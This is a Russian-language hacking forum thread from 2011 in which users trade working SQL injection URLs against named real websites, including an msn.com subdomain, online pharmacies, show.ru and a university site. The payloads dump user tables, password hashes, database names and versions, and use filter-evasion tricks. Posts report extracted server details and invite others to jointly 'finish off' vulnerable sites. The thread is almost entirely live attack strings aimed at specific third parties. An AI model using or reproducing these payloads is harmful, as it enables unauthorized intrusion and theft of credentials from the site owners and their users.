 |
|
06.12.2011, 23:47
|
|
Постоянный
Регистрация: 17.04.2011
Сообщений: 638
С нами:
7932566
Репутация:
81
|
|
Поддомен msn.com
URL:
Код:
http://recettes.styledevie.ca.msn.com/forum/message.php?id=292963+and+1=0+union+select+1,2,3,4,group_concat%28concat_ws%280x3a3a3a,password,pseudonyme%29+separator+0x0b%29,6,7,8,9,10,11+from+membres+WHERE+pseudonyme=%27Hope%27+limit+0,20--
Database: recettes
Version MySQL: 5.1.38-community-log
User: recettes@mtl2tcesxweb16.tcm.int
Сначала скуль была под грифом "Top Secret", теперь, думаю могу её запостить!
-----------------------------------------------------------------------------
URL:
Код:
http://crimeahouse.net/doska/ind.php?id_typ=-6+union+/*!select*/+1,2,3,4,5,6,%28/*!select*/%28@x%29from%28/*!select*/%28@x:=0x00%29,%28/*!select*/%28null%29from%28information_schema./*!columns*/%29where%28table_schema!=0x696e666f726d6174696f6e5f736368656d61%29and%280x00%29in%28@x:=/*!concat%28@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name%29*/%29%29%29x%29,8,9,10,11,12,13,14,15,16,17,18,19,20+--+
Database: crimeaho_doska
Version MySQL: 5.0.92-community
User: crimeaho_admin@localhost
тИЦ: 10
PR: 1
-----------------------------------------------------------------------------
URL:
Код:
http://www.totalmma.ru/biography.php?id=2+and+1=0+union+select+1,concat_ws%280x3a3a3a,user%28%29,database%28%29,version%28%29%29--
Database: fightn_mma
Version MySQL: 5.1.56
User: fightn@localhost
тИЦ: 0
PR: 1
P.S Шелл лил не через скулю
|
|
|
07.12.2011, 12:19
|
|
Познавший АНТИЧАТ
Регистрация: 09.11.2009
Сообщений: 1,077
С нами:
8686406
Репутация:
265
|
|
Сообщение от None
http://allmedsnow.biz/index.php?sectiune=5&lang=ru&id_categ=-41+union+select+1,table_name,3,4+from+information_ schema.tables+limit+22,1+--+
ещё один шоп))
|
|
|
|
07.12.2011, 14:00
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
ВИАГРА + сюприз
№1
Код HTML:
http://acomplia.viagranow.eu/getdata.php?id=1+union+select+version(),2--+f
№2
Код HTML:
http://online-viagranow.com/getdata.php?id=1+union+select+version(),2--+f
№3
Код HTML:
http://reductil-meridia.biz/getdata.php?id=1+union+select+version(),2--+f
№4
Код HTML:
http://viagra-freeonline.biz/getdata.php?id=1+union+select+version(),2--+f
№5
Код HTML:
http://viagranow.biz/getdata.php?id=1+union+select+version(),2--+f
№6
Код HTML:
http://www.meds4u.eu/getdata.php?id=1+union+select+version(),2--+f
№7
Код HTML:
http://www.viagra-4u.com/getdata.php?id=1+union+select+version(),2--+f
№8
Код HTML:
http://www.viagra-enligne.com/getdata.php?id=1+union+select+version(),2--+f
А вот и сюприз. Все сайты на одном сервере, по следам stepaska_
|
|
|
|
07.12.2011, 23:07
|
|
Познающий
Регистрация: 28.07.2009
Сообщений: 98
С нами:
8836437
Репутация:
136
|
|
http://www.show.ru/
http://www.show.ru/index.php?cat=247&eventId=-46589%20and%201=2%20union%20select%20concat_ws(cha r(58),@@version,user(),database(),@@version_compil e_os)+--
5.0.77-log admin_beta@83.222.2.225 admin_beta redhat-linux-gn
если кому не лень.....добивайте.... http://www.show.ru/index.php?cat=247&eventId=-46589%20and%201=2%20union%20select%20table_name+fr om%20information_schema.tables%20limit%2017524,1--
|
|
|
|
08.12.2011, 15:06
|
|
Постоянный
Регистрация: 13.10.2010
Сообщений: 375
С нами:
8200406
Репутация:
38
|
|
офф сайт СMS
Код:
http://www.jasawebsitemurah.info/cms/view.php?idArtikel=1+union+select+1,2,3,concat_ws(0x3a,username,password),5,6,7,8+from+jasaweb_cms.user+limit+0,1+--+
пароли/хеши нельзя выкладывать
|
|
|
|
09.12.2011, 13:44
|
|
Постоянный
Регистрация: 13.10.2010
Сообщений: 375
С нами:
8200406
Репутация:
38
|
|
Код:
http://student.d3ti.mipa.uns.ac.id/arkan/view.php?idArtikel=-19+union+select+1,2,concat_ws(%200x3a,username,password),4,5,6,7,8+from+user+limit+0,1+--+
|
|
|
|
09.12.2011, 22:22
|
|
Новичок
Регистрация: 03.05.2009
Сообщений: 7
С нами:
8960082
Репутация:
-14
|
|
тИЦ 100
Код:
http://fortland.ru/index.html?action=news&act=news_p&id=99999999/*--*/UnIoN/*--*/SeleCt/*--*/1,@@version,3,4,5,6,7,8--
P.S: через несколько секунд "выбрасывает" на другую страницу....
Код:
http://fortland.ru/index.html?action=news&act=news_p&id=99999999/*--*/UnIoN/*--*/SeleCt/*--*/1,group_concat%28TABLE_NAME%29,3,4,5,6,7,8/*--*/FrOm/*--*/INFORMATION_SCHEMA.TABLES--+
|
|
|
|
10.12.2011, 02:06
|
|
Участник форума
Регистрация: 31.08.2006
Сообщений: 149
С нами:
10365076
Репутация:
155
|
|
Тиц 70
Сообщение от None
http://www.open-pasport.ru/dop_infa.php?pid=-1+UnIoN+seLEct+1,2,3--
www.iteam.ru
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.iteam.ru/articles.php?pid=1&tid=2&sid=16&id=-131/**/UnION/**/SeLEcT/**/1,2,UNHEX(HEX(version())),4,5,6,7--[/COLOR][/COLOR]
Тиц 210
www.ndelo.ru
Код:
http://www.ndelo.ru/survey.php?qid=241+union+select+1,2,3,4,5,6,7,8,9,10,11--&r=0.19475362145586483
Давайте вместе раскрутим эту скулю, фильтруется слово select |
|
|
|
10.12.2011, 06:52
|
|
Постоянный
Регистрация: 13.10.2010
Сообщений: 375
С нами:
8200406
Репутация:
38
|
|
Сообщение от cylaaaan
Давайте вместе раскрутим эту скулю, фильтруется слово select
Я могу ошибатся, но помоему не выйдет. Долбался с таким методом защиты, он все запросы приводит к нижнему регистру и сверяет ключами. Если там есть структуры типа +select - отсекается запрос. Надежда только на другие запросы, т.к. фильтруют в основном get\post.
Попробуй кук\хедер. Я не дома, попробовать не выйдет
|
|
|
|
10.12.2011, 11:06
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
Сообщение от cylaaaan
Тиц 70
Давайте вместе раскрутим эту скулю, фильтруется слово select
Кроме blind вариантов не вижу...
database(): ndelo_bases
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
